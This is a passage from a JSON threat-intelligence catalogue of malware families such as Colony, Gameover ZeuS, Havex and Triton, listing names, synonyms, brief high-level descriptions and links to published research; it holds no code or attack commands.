"uuid": "4db94d24-209a-4edd-b175-3a3085739b94",
"value": "Colony",
"description": "",
"meta": {
"synonyms": [
"Bandios",
"GrayBird"
],
"type": [],
"refs": [
"https://twitter.com/anyrun_app/status/976385355384590337",
"https://secrary.com/ReversingMalware/Colony_Bandios/",
"https://pastebin.com/GtjBXDmz"
]
}
},
{
"uuid": "d66f466a-e70e-4b62-9a04-d62eb41da15c",
"value": "SeaSalt",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://www.scribd.com/document/349629589/Appendix-C-Digital-The-Malware-Arsenal-pdf"
]
}
},
{
"uuid": "92960f1f-5099-4e38-a177-14a5e3b8d601",
"value": "Dairy",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://www.scribd.com/document/349629589/Appendix-C-Digital-The-Malware-Arsenal-pdf"
]
}
},
{
"uuid": "05ddb459-5a2f-44d5-a135-ed3f1e772302",
"value": "Crossrider",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://blog.malwarebytes.com/threat-analysis/2018/04/new-crossrider-variant-installs-configuration-profiles-on-macs/?utm_source=twitter&utm_medium=social"
]
}
},
{
"uuid": "e895a0d2-fe4b-4793-9440-9db2d56a97f2",
"value": "JripBot",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://securelist.com/blog/research/71275/wild-neutron-economic-espionage-threat-actor-returns-with-new-tricks/"
]
}
},
{
"uuid": "38734f44-ebc4-4250-a20e-5dac0fb5c0ed",
"value": "Socks5 Systemz",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": []
}
},
{
"uuid": "91af1080-6378-4a90-ba1e-78634cd31efe",
"value": "EtumBot",
"description": "",
"meta": {
"synonyms": [
"HighTide"
],
"type": [],
"refs": [
"https://www.arbornetworks.com/blog/asert/wp-content/uploads/2014/06/ASERT-Threat-Intelligence-Brief-2014-07-Illuminating-Etumbot-APT.pdf",
"https://www.fireeye.com/blog/threat-research/2014/09/darwins-favorite-apt-group-2.html",
"https://www.zscaler.com/blogs/research/cnacom-open-source-exploitation-strategic-web-compromise"
]
}
},
{
"uuid": "9cd98c61-0dfa-4af6-b334-65eb43bc8d9d",
"value": "Golroted",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"http://www.vkremez.com/2017/11/lets-learn-dissecting-golroted-trojans.html"
]
}
},
{
"uuid": "eb189fd3-ca39-4bc7-be2d-4ea9e89d9ab9",
"value": "Elirks",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://researchcenter.paloaltonetworks.com/2016/09/mile-tea-cyber-espionage-campaign-targets-asia-pacific-businesses-and-government-agencies/"
]
}
},
{
"uuid": "2789b246-d762-4d38-8cc8-302293e314da",
"value": "LogPOS",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://securitykitten.github.io/2015/11/16/logpos-new-point-of-sale-malware-using-mailslots.html"
]
}
},
{
"uuid": "dd486e92-54fe-4306-9aab-05863cb6c6e1",
"value": "InnaputRAT",
"description": "InnaputRAT, a RAT capable of exfiltrating files from victim machines, was distributed by threat actors using phishing and Godzilla Loader. The RAT has evolved through multiple variants dating back to 2016. Recent campaigns distributing InnaputRAT beaconed to live C2 as of March 26, 2018.",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://asert.arbornetworks.com/innaput-actors-utilize-remote-access-trojan-since-2016-presumably-targeting-victim-files/"
]
}
},
{
"uuid": "c21335f5-b145-4029-b1bc-161362c7ce80",
"value": "PadCrypt",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://johannesbader.ch/2016/03/the-dga-of-padcrypt/",
"https://www.bleepingcomputer.com/news/security/padcrypt-the-first-ransomware-with-live-support-chat-and-an-uninstaller/"
]
}
},
{
"uuid": "58ae14a9-c4aa-490c-8404-0eb590f5650d",
"value": "FriedEx",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://www.welivesecurity.com/2018/01/26/friedex-bitpaymer-ransomware-work-dridex-authors/"
]
}
},
{
"uuid": "81ca4876-b4a4-43e9-b8a9-8a88709dd3d2",
"value": "Darkmoon",
"description": "",
"meta": {
"synonyms": [
"Chymine"
],
"type": [],
"refs": [
"http://contagiodump.blogspot.com/2010/01/jan-17-trojan-darkmoonb-exe-haiti.html",
"https://www.f-secure.com/v-descs/trojan-downloader_w32_chymine_a.shtml",
"http://contagiodump.blogspot.com/2010/07/cve-2010-2568-keylogger-win32chyminea.html"
]
}
},
{
"uuid": "ffc8c386-e9d6-4889-afdf-ebf37621bc4f",
"value": "Gameover P2P",
"description": "Gameover ZeuS is a peer-to-peer botnet based on components from the earlier ZeuS trojan. According to a report by Symantec, Gameover Zeus has largely been used for banking fraud and distribution of the CryptoLocker ransomware. In early June 2014, the U.S. Department of Justice announced that an international inter-agency collaboration named Operation Tovar had succeeded in temporarily cutting communication between Gameover ZeuS and its command and control servers.",
"meta": {
"synonyms": [
"ZeuS P2P",
"GOZ"
],
"type": [],
"refs": [
"https://www.cert.pl/wp-content/uploads/2015/12/2013-06-p2p-rap_en.pdf",
"http://www.syssec-project.eu/m/page-media/3/zeus_malware13.pdf",
"https://www.wired.com/?p=2171700",
"https://www.justice.gov/opa/pr/us-leads-multi-national-action-against-gameover-zeus-botnet-and-cryptolocker-ransomware",
"https://www.fox-it.com/nl/wp-content/uploads/sites/12/FoxIT-Whitepaper_Blackhat-web.pdf"
]
}
},
{
"uuid": "b74747e0-59ac-4adf-baac-78213a234ff5",
"value": "BatchWiper",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"http://contagiodump.blogspot.com/2012/12/batchwiper-samples.html"
]
}
},
{
"uuid": "d9215579-eee0-4e50-9157-dba7c3214769",
"value": "GuiInject",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://sentinelone.com/blogs/analysis-ios-guiinject-adware-library/"
]
}
},
{
"uuid": "bcc8e3ef-fc5e-4d44-9011-4d429bac0f26",
"value": "PubNubRAT",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://blog.talosintelligence.com/2018/04/fake-av-investigation-unearths-kevdroid.html"
]
}
},
{
"uuid": "fedac411-0638-48dc-8ac5-1b4171fa8a29",
"value": "Magniber",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://blog.malwarebytes.com/threat-analysis/2017/10/magniber-ransomware-exclusively-for-south-koreans/",
"https://www.youtube.com/watch?v=lqWJaaofNf4",
"http://asec.ahnlab.com/1124"
]
}
},
{
"uuid": "f7081626-130a-48d5-83a9-759b3ef198ec",
"value": "Murofet",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": []
}
},
{
"uuid": "8468f2a7-f541-4130-b57a-ea678aa30a0a",
"value": "Mokes",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://securelist.com/from-linux-to-windows-new-family-of-cross-platform-desktop-backdoors-discovered/73503/"
]
}
},
{
"uuid": "24fe5fef-6325-4c21-9c35-a0ecd185e254",
"value": "EDA2",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://twitter.com/JaromirHorejsi/status/815861135882780673"
]
}
},
{
"uuid": "07a41ea7-17b2-4852-bfd7-54211c477dc0",
"value": "Felismus",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://www.symantec.com/connect/blogs/sowbug-cyber-espionage-group-targets-south-american-and-southeast-asian-governments"
]
}
},
{
"uuid": "a51b82ba-7e32-4a8e-b5d0-8d0441bdcce4",
"value": "SunOrcal",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://researchcenter.paloaltonetworks.com/2017/11/unit42-new-malware-with-ties-to-sunorcal-discovered/",
"http://pwc.blogs.com/cyber_security_updates/2016/03/index.html"
]
}
},
{
"uuid": "bdc7cc9c-c46d-4f77-b903-2335cc1a3369",
"value": "Sathurbot",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://www.welivesecurity.com/2017/04/06/sathurbot-distributed-wordpress-password-attack/"
]
}
},
{
"uuid": "aff47054-7130-48ca-aa2c-247bdf44f180",
"value": "Unidentified 029",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": []
}
},
{
"uuid": "3af9397a-b4f7-467d-93af-b3d77dcfc38d",
"value": "Lambert",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"http://adelmas.com/blog/longhorn.php",
"https://www.youtube.com/watch?v=jeLd-gw2bWo",
"https://www.symantec.com/connect/blogs/longhorn-tools-used-cyberespionage-group-linked-vault-7",
"https://securelist.com/blog/research/77990/unraveling-the-lamberts-toolkit/"
]
}
},
{
"uuid": "127c3d76-6323-4363-93e0-cd06ade0dd52",
"value": "GPCode",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"http://www.xylibox.com/2011/01/gpcode-ransomware-2010-simple-analysis.html",
"http://www.zdnet.com/article/whos-behind-the-gpcode-ransomware/",
"https://de.securelist.com/analysis/59479/erpresser/",
"ftp://ftp.tuwien.ac.at/languages/php/oldselfphp/internet-security/analysen/index-id-200883584.html",
"https://www.symantec.com/security_response/writeup.jsp?docid=2007-071711-3132-99&tabid=2"
]
}
},
{
"uuid": "af338ac2-8103-4419-8393-fb4f3b43af4b",
"value": "Bedep",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": []
}
},
{
"uuid": "4734c5a4-e63b-4bb4-8c01-ab0c638a6c21",
"value": "HerpesBot",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": []
}
},
{
"uuid": "5d9a27e7-3110-470a-ac0d-2bf00cac7846",
"value": "Ranbyus",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://www.welivesecurity.com/2012/12/19/win32spy-ranbyus-modifying-java-code-in-rbs/",
"https://www.welivesecurity.com/2012/06/05/smartcard-vulnerabilities-in-modern-banking-malware/",
"http://www.xylibox.com/2013/01/trojanwin32spyranbyus.html",
"https://www.johannesbader.ch/2015/05/the-dga-of-ranbyus/"
]
}
},
{
"uuid": "9b5255c6-44e5-4ec3-bc03-7e00e220c937",
"value": "Nymaim",
"description": "",
"meta": {
"synonyms": [
"nymain"
],
"type": [],
"refs": [
"https://www.cert.pl/en/news/single/nymaim-revisited/"
]
}
},
{
"uuid": "4da036c4-b76d-4f25-bc9e-3c5944ad0993",
"value": "Xpan",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://securelist.com/blog/research/78110/xpan-i-am-your-father/",
"https://securelist.com/blog/research/76153/teamxrat-brazilian-cybercrime-meets-ransomware/"
]
}
},
{
"uuid": "045df65f-77fe-4880-af34-62ca33936c6e",
"value": "Odinaff",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://www.symantec.com/connect/blogs/odinaff-new-trojan-used-high-level-financial-attacks"
]
}
},
{
"uuid": "9218630d-0425-4b18-802c-447a9322990d",
"value": "Zollard",
"description": "",
"meta": {
"synonyms": [
"darlloz"
],
"type": [],
"refs": [
"https://blogs.cisco.com/security/the-internet-of-everything-including-malware"
]
}
},
{
"uuid": "40c66571-164c-4050-9c84-f37c9cd84055",
"value": "Unidentified 020 (Vault7)",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://wikileaks.org/ciav7p1/cms/page_34308128.html"
]
}
},
{
"uuid": "7f6cd579-b021-4896-80da-fcc07c35c8b2",
"value": "TorrentLocker",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"http://www.isightpartners.com/2014/08/analysis-torrentlocker-new-strain-malware-using-components-cryptolocker-cryptowall/",
"http://www.bleepingcomputer.com/forums/t/547708/torrentlocker-ransomware-cracked-and-decrypter-has-been-made/"
]
}
},
{
"uuid": "9e8655fc-5bba-4efd-b3c0-db89ee2e0e0b",
"value": "Cutwail",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": []
}
},
{
"uuid": "8f785ee5-1663-4972-9a64-f02e7c46ba66",
"value": "gamapos",
"description": "",
"meta": {
"synonyms": [
"pios"
],
"type": [],
"refs": [
"http://documents.trendmicro.com/assets/GamaPOS_Technical_Brief.pdf"
]
}
},
{
"uuid": "d8295eba-60ef-4900-8091-d694180de565",
"value": "Nautilus",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://www.ncsc.gov.uk/alerts/turla-group-malware"
]
}
},
{
"uuid": "7be3f3b3-5047-4422-ad9d-86a7bc321931",
"value": "X-Agent",
"description": "",
"meta": {
"synonyms": [
"splm",
"chopstick"
],
"type": [],
"refs": [
"https://contagiodump.blogspot.de/2017/02/russian-apt-apt28-collection-of-samples.html",
"https://www.crowdstrike.com/blog/bears-midst-intrusion-democratic-national-committee/",
"https://www.welivesecurity.com/2017/12/21/sednit-update-fancy-bear-spent-year/",
"http://www2.fireeye.com/rs/fireye/images/rpt-apt28.pdf",
"http://www.welivesecurity.com/wp-content/uploads/2016/10/eset-sednit-part-2.pdf"
]
}
},
{
"uuid": "af1c99be-e55a-473e-abed-726191e1da05",
"value": "BadEncript",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://twitter.com/PhysicalDrive0/status/833067081981710336"
]
}
},
{
"uuid": "8f78a226-1314-4778-9bc2-ca850e9e0037",
"value": "X-Agent",
"description": "",
"meta": {
"synonyms": [
"Popr-d30"
],
"type": [],
"refs": [
"http://blog.crysys.hu/2017/01/technical-details-on-the-fancy-bear-android-malware-poprd30-apk/",
"http://blog.crysys.hu/2017/03/update-on-the-fancy-bear-android-malware-poprd30-apk/"
]
}
},
{
"uuid": "6aabb492-e282-40fb-a840-fe4e643ec094",
"value": "Allaple",
"description": "",
"meta": {
"synonyms": [
"Starman"
],
"type": [],
"refs": [
"https://trapx.com/wp-content/uploads/2017/08/White_Paper_TrapX_AllapleWorm.pdf",
"https://researchcenter.paloaltonetworks.com/2014/08/hunting-mutex/"
]
}
},
{
"uuid": "dfb745f1-600a-4d31-a3b0-57bd0a72ac2e",
"value": "Naikon",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://securelist.com/analysis/publications/69953/the-naikon-apt/",
"https://www2.fireeye.com/rs/fireye/images/rpt-apt30.pdf"
]
}
},
{
"uuid": "a517cdd1-6c82-4b29-bdd2-87e281227597",
"value": "FruitFly",
"description": "",
"meta": {
"synonyms": [
"Quimitchin"
],
"type": [],
"refs": [
"https://arstechnica.com/security/2017/01/newly-discovered-mac-malware-may-have-circulated-in-the-wild-for-2-years/",
"https://www.virusbulletin.com/virusbulletin/2017/11/vb2017-paper-offensive-malware-analysis-dissecting-osxfruitflyb-custom-cc-server/",
"https://www.documentcloud.org/documents/4346338-Phillip-Durachinsky-Indictment.html",
"https://arstechnica.com/security/2017/07/perverse-malware-infecting-hundreds-of-macs-remained-undetected-for-years/",
"https://blog.malwarebytes.com/threat-analysis/2017/01/new-mac-backdoor-using-antiquated-code/"
]
}
},
{
"uuid": "1df3b58a-e5d2-4d2a-869c-8d4532cc9f52",
"value": "ThumbThief",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"http://www.welivesecurity.com/2016/03/23/new-self-protecting-usb-trojan-able-to-avoid-detection/"
]
}
},
{
"uuid": "c51ee09b-fc2d-41fd-a43b-426a4f337139",
"value": "CCleaner Backdoor",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://blog.avast.com/new-investigations-in-ccleaner-incident-point-to-a-possible-third-stage-that-had-keylogger-capacities",
"https://blog.avast.com/additional-information-regarding-the-recent-ccleaner-apt-security-incident",
"http://www.intezer.com/evidence-aurora-operation-still-active-part-2-more-ties-uncovered-between-ccleaner-hack-chinese-hackers/",
"https://blog.avast.com/avast-threat-labs-analysis-of-ccleaner-incident",
"http://blog.talosintelligence.com/2017/09/avast-distributes-malware.html",
"http://www.intezer.com/evidence-aurora-operation-still-active-supply-chain-attack-through-ccleaner/",
"https://blog.avast.com/progress-on-ccleaner-investigation",
"https://www.wired.com/story/ccleaner-malware-targeted-tech-firms",
"https://blog.avast.com/update-ccleaner-attackers-entered-via-teamviewer",
"https://twitter.com/craiu/status/910148928796061696",
"https://www.crowdstrike.com/blog/protecting-software-supply-chain-deep-insights-ccleaner-backdoor/",
"http://blog.morphisec.com/morphisec-discovers-ccleaner-backdoor",
"https://www.crowdstrike.com/blog/in-depth-analysis-of-the-ccleaner-backdoor-stage-2-dropper-and-its-payload/",
"http://blog.talosintelligence.com/2017/09/ccleaner-c2-concern.html"
]
}
},
{
"uuid": "1a4f99cc-c078-41f8-9749-e1dc524fc795",
"value": "ARS VBS Loader",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://www.flashpoint-intel.com/blog/meet-ars-vbs-loader/",
"https://twitter.com/Racco42/status/1001374490339790849"
]
}
},
{
"uuid": "94793dbc-3649-40a4-9ccc-1b32846ecb3a",
"value": "Nocturnal Stealer",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://www.proofpoint.com/us/threat-insight/post/thief-night-new-nocturnal-stealer-grabs-data-cheap"
]
}
},
{
"uuid": "72961adc-ace1-4593-99f1-266119ddeccb",
"value": "Unidentified 001",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": []
}
},
{
"uuid": "fd9904a6-6e06-4b50-8bfd-64ffb793d4a4",
"value": "ThunderShell",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://github.com/Mr-Un1k0d3r/ThunderShell"
]
}
},
{
"uuid": "857e61fe-ccb2-426b-ad7b-696112f48dbb",
"value": "Karagany",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://www.symantec.com/connect/blogs/dragonfly-western-energy-sector-targeted-sophisticated-attack-group"
]
}
},
{
"uuid": "ef4383f6-29fd-4b06-9a1f-b788567fd8fd",
"value": "Ghole",
"description": "",
"meta": {
"synonyms": [
"CoreImpact (Modified)"
],
"type": [],
"refs": [
"http://www.trendmicro.it/media/wp/operation-woolen-goldfish-whitepaper-en.pdf",
"https://www.coresecurity.com/core-impact"
]
}
},
{
"uuid": "989330e9-52da-4489-888b-686429db3a45",
"value": "ZhMimikatz",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://www.cylance.com/content/dam/cylance/pages/operation-cleaver/Cylance_Operation_Cleaver_Report.pdf"
]
}
},
{
"uuid": "ab2a63f1-1afd-44e7-9cf4-c775dbee78f4",
"value": "Vreikstadi",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://twitter.com/malware_traffic/status/821483557990318080"
]
}
},
{
"uuid": "1a1fd8f1-1fe4-4dc7-bbef-ad0563db3010",
"value": "win.phorpiex",
"description": "Proofpoint describes Phorpiex/Trik as a SDBot fork (thus IRC-based) that has been used to distribute GandCrab, Pushdo, Pony, and coinminers. The name Trik is derived from PDB strings.",
"meta": {
"synonyms": [
"Trik"
],
"type": [],
"refs": [
"https://www.johannesbader.ch/2016/02/phorpiex/",
"https://blog.trendmicro.com/trendlabs-security-intelligence/shylock-not-the-lone-threat-targeting-skype/",
"https://www.bleepingcomputer.com/news/security/trik-spam-botnet-leaks-43-million-email-addresses/",
"https://www.proofpoint.com/us/threat-insight/post/phorpiex-decade-spamming-shadows"
]
}
},
{
"uuid": "246060e5-1685-4e97-a6c6-994b3879c8fa",
"value": "Crisis",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://www.intego.com/mac-security-blog/new-apple-mac-trojan-called-osxcrisis-discovered-by-intego-virus-team/?",
"http://contagiodump.blogspot.com/2012/12/aug-2012-w32crisis-and-osxcrisis-jar.html",
"https://www.symantec.com/connect/blogs/crisis-windows-sneaks-virtual-machines"
]
}
},
{
"uuid": "82ab5235-a71e-4692-a08c-8db337d8b53a",
"value": "Stinger",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": []
}
},
{
"uuid": "c7ab9e5a-0ec9-481e-95ec-ad08f06cf985",
"value": "HTML5 Encoding",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://www.welivesecurity.com/2017/06/06/turlas-watering-hole-campaign-updated-firefox-extension-abusing-instagram/"
]
}
},
{
"uuid": "ce25929c-0358-477c-a85e-f0bdfcc99a54",
"value": "AMTsol",
"description": "",
"meta": {
"synonyms": [
"Adupihan"
],
"type": [],
"refs": [
"https://blogs.technet.microsoft.com/mmpc/2017/06/07/platinum-continues-to-evolve-find-ways-to-maintain-invisibility/",
"http://download.microsoft.com/download/2/2/5/225BFE3E-E1DE-4F5B-A77B-71200928D209/Platinum%20feature%20article%20-%20Targeted%20attacks%20in%20South%20and%20Southeast%20Asia%20April%202016.pdf"
]
}
},
{
"uuid": "c6a46f63-3ff1-4952-8350-fad9816b45c9",
"value": "CsExt",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://www.cylance.com/content/dam/cylance/pages/operation-cleaver/Cylance_Operation_Cleaver_Report.pdf"
]
}
},
{
"uuid": "0884cf65-564e-4ee2-b4e5-b73f8bbd6a34",
"value": "Thanatos Ransomware",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://blog.talosintelligence.com/2018/06/ThanatosDecryptor.html",
"https://www.bleepingcomputer.com/news/security/thanatos-ransomware-is-first-to-use-bitcoin-cash-messes-up-encryption/",
"https://www.bleepingcomputer.com/news/security/thanatos-ransomware-decryptor-released-by-the-cisco-talos-group/"
]
}
},
{
"uuid": "7368ab0c-ef4b-4f53-a746-f150b8afa665",
"value": "DiamondFox",
"description": "",
"meta": {
"synonyms": [
"Crystal",
"Gorynch",
"Gorynych"
],
"type": [],
"refs": [
"https://blog.malwarebytes.com/threat-analysis/2017/03/diamond-fox-p1/",
"http://blog.checkpoint.com/2017/05/10/diamondfox-modular-malware-one-stop-shop/",
"https://www.scmagazine.com/inside-diamondfox/article/578478/",
"https://blog.cylance.com/a-study-in-bots-diamondfox",
"https://blog.malwarebytes.com/threat-analysis/2017/04/diamond-fox-p2/"
]
}
},
{
"uuid": "7eeafa7c-0282-4667-bb1a-5ebc3a845d6d",
"value": "Spora",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://nakedsecurity.sophos.com/2017/06/26/how-spora-ransomware-tries-to-fool-antivirus/",
"https://blog.malwarebytes.com/threat-analysis/2017/03/spora-ransomware/",
"https://www.linkedin.com/pulse/spora-ransomware-understanding-hta-infection-vector-kevin-douglas",
"https://www.gdatasoftware.com/blog/2017/01/29442-spora-worm-and-ransomware",
"https://github.com/MinervaLabsResearch/SporaVaccination",
"http://malware-traffic-analysis.net/2017/01/17/index2.html"
]
}
},
{
"uuid": "c8a7c6e7-c6d3-4978-8a1d-190162de5e0d",
"value": "Matryoshka RAT",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"http://www.clearskysec.com/tulip/"
]
}
},
{
"uuid": "168bf2a1-45a5-41ac-b364-5740e7ce9757",
"value": "Unidentified 042",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"http://www.intezer.com/lazarus-group-targets-more-cryptocurrency-exchanges-and-fintech-companies/"
]
}
},
{
"uuid": "d2414f4a-1eda-4d80-84d3-ed130ca14e3c",
"value": "TinyTyphon",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://www.forcepoint.com/sites/default/files/resources/files/forcepoint-security-labs-monsoon-analysis-report.pdf"
]
}
},
{
"uuid": "d674ffd2-1f27-403b-8fe9-b4af6e303e5c",
"value": "Uroburos",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://blog.fox-it.com/2017/05/03/snake-coming-soon-in-mac-os-x-flavour/",
"https://blog.malwarebytes.com/threat-analysis/2017/05/snake-malware-ported-windows-mac/"
]
}
},
{
"uuid": "ec0cad2c-0c13-491a-a869-1dc1758c8872",
"value": "NavRAT",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://blog.talosintelligence.com/2018/05/navrat.html?m=1"
]
}
},
{
"uuid": "55d5742e-20f5-4c9a-887a-4dbd5b37d921",
"value": "CryptoMix",
"description": "",
"meta": {
"synonyms": [
"CryptFile2"
],
"type": [],
"refs": [
"https://www.bleepingcomputer.com/news/security/work-cryptomix-ransomware-variant-released/",
"https://www.cert.pl/en/news/single/technical-analysis-of-cryptomixcryptfile2-ransomware/"
]
}
},
{
"uuid": "c04fc02e-f35a-44b6-a9b0-732bf2fc551a",
"value": "Havex RAT",
"description": "Havex is a remote access trojan (RAT) that was discovered in 2013 as part of a widespread espionage campaign targeting industrial control systems (ICS) used across numerous industries and attributed to a hacking group referred to as \"Dragonfly\" and \"Energetic Bear\". Havex is estimated to have impacted thousands of infrastructure sites, a majority of which were located in Europe and the United States. Within the energy sector, Havex specifically targeted energy grid operators, major electricity generation firms, petroleum pipeline operators, and industrial equipment providers. Havex also impacted organizations in the aviation, defense, pharmaceutical, and petrochemical industries.\r\n\r\nOnce installed, Havex scanned the infected system to locate any Supervisory Control and Data Acquisition (SCADA) or ICS devices on the network and sent the data back to command and control servers. To do so, the malware leveraged the Open Platform Communications (OPC) standard, which is a universal communication protocol used by ICS components across many industries that facilitates open connectivity and vendor equipment interoperability. Havex used the Distributed Component Object Model (DCOM) to connect to OPC servers inside of an ICS network and collect information such as CLSID, server name, Program ID, OPC version, vendor information, running state, group count, and server bandwidth.\r\n\r\nHavex was an intelligence-collection tool used for espionage and not for the disruption or destruction of industrial systems. However, the data collected by Havex would have aided efforts to design and develop attacks against specific targets or industries.",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://www.f-secure.com/weblog/archives/00002718.html"
]
}
},
{
"uuid": "3b6c1771-6d20-4177-8be0-12116e254bf5",
"value": "GhostCtrl",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://blog.trendmicro.com/trendlabs-security-intelligence/android-backdoor-ghostctrl-can-silently-record-your-audio-video-and-more/"
]
}
},
{
"uuid": "0f02ea79-5833-46e0-8458-c4a863a5a112",
"value": "Jaku",
"description": "",
"meta": {
"synonyms": [
"Reconcyc"
],
"type": [],
"refs": [
"https://www.forcepoint.com/sites/default/files/resources/files/report_jaku_analysis_of_botnet_campaign_en_0.pdf",
"https://www-01.ibm.com/support/docview.wss?uid=ssg1S1010146"
]
}
},
{
"uuid": "79606b2b-72f0-41e3-8116-1093c1f94b15",
"value": "win.triton",
"description": "Malware targeting Triconex Safety Instrumented System (SIS) controllers, which are commonly used in Industrial Control Systems (ICS).",
"meta": {
"synonyms": [
"Trisis",
"HatMan"
],
"type": [],
"refs": [
"https://www.fireeye.com/blog/threat-research/2017/12/attackers-deploy-new-ics-attack-framework-triton.html",
"https://www.midnightbluelabs.com/blog/2018/1/16/analyzing-the-triton-industrial-malware",
"https://github.com/ICSrepo/TRISIS-TRITON-HATMAN",
"https://ics-cert.us-cert.gov/sites/default/files/documents/MAR-17-352-01%20HatMan%E2%80%94Safety%20System%20Targeted%20Malware_S508C.pdf",
"https://dragos.com/blog/trisis/TRISIS-01.pdf"
]
}
},
{
"uuid": "9af26655-cfba-4e02-bd10-ad1a494e0b5f",
"value": "Helauto",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://www.scribd.com/document/349629589/Appendix-C-Digital-The-Malware-Arsenal-pdf"
]
}
},
{
"uuid": "1eceb5c0-3a01-43c2-b204-9957b15cf763",
"value": "badflick",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://www.fireeye.com/blog/threat-research/2018/03/suspected-chinese-espionage-group-targeting-maritime-and-engineering-industries.html"
]
}
},
{
"uuid": "b7dc52a1-7423-4a7a-a102-1df6122187ad",
"value": "DualToy",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://researchcenter.paloaltonetworks.com/2016/09/dualtoy-new-windows-trojan-sideloads-risky-apps-to-android-and-ios-devices/"
]
}
},
{
"uuid": "da79cf10-df9f-4cd3-bbce-ae9f357633f0",
"value": "Lamdelin",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"http://news.thewindowsclub.com/poorly-coded-lamdelin-lockscreen-ransomware-alt-f4-88576/"
]
}
},
{
"uuid": "e437f01c-8040-4098-a3fa-20154b58c928",
"value": "PC Surveillance System",
"description": "Citizenlab notes that PC Surveillance System (PSS) is a commercial spyware product offered by Cyberbit and marketed to intelligence and law enforcement agencies.",
"meta": {
"synonyms": [
"PSS"
],
"type": [],
"refs": [
"https://citizenlab.ca/2017/12/champing-cyberbit-ethiopian-dissidents-targeted-commercial-spyware/"
]
}
},
{
"uuid": "8b33ba21-9af7-4536-bd02-23dd863147e8",
"value": "Kardon Loader",
"description": "According to ASERT, Kardon Loader is a fully featured downloader, enabling the download and installation of other malware, e.g. banking trojans/credential theft etc. This malware has been on sale by an actor under the username Yattaze, starting in late April. The actor offers the sale of the malware as a standalone build with charges for each additional rebuild, or the ability to set up a botshop, in which case any customer can establish their own operation and further sell access to a new customer base.",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://asert.arbornetworks.com/kardon-loader-looks-for-beta-testers/",
"https://engineering.salesforce.com/kardon-loader-malware-analysis-adaaaab42bab"
]
}
},
{
"uuid": "1035ea6f-6743-4e69-861c-454c19ec96ae",
"value": "WebC2-Table",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://www.scribd.com/document/349629589/Appendix-C-Digital-The-Malware-Arsenal-pdf"
]
}
},
{
"uuid": "21ab9e14-602a-4a76-a308-dbf5d6a91d75",
"value": "Sedreco",
"description": "",
"meta": {
"synonyms": [
"eviltoss",
"azzy"
],
"type": [],
"refs": [
"https://contagiodump.blogspot.de/2017/02/russian-apt-apt28-collection-of-samples.html",
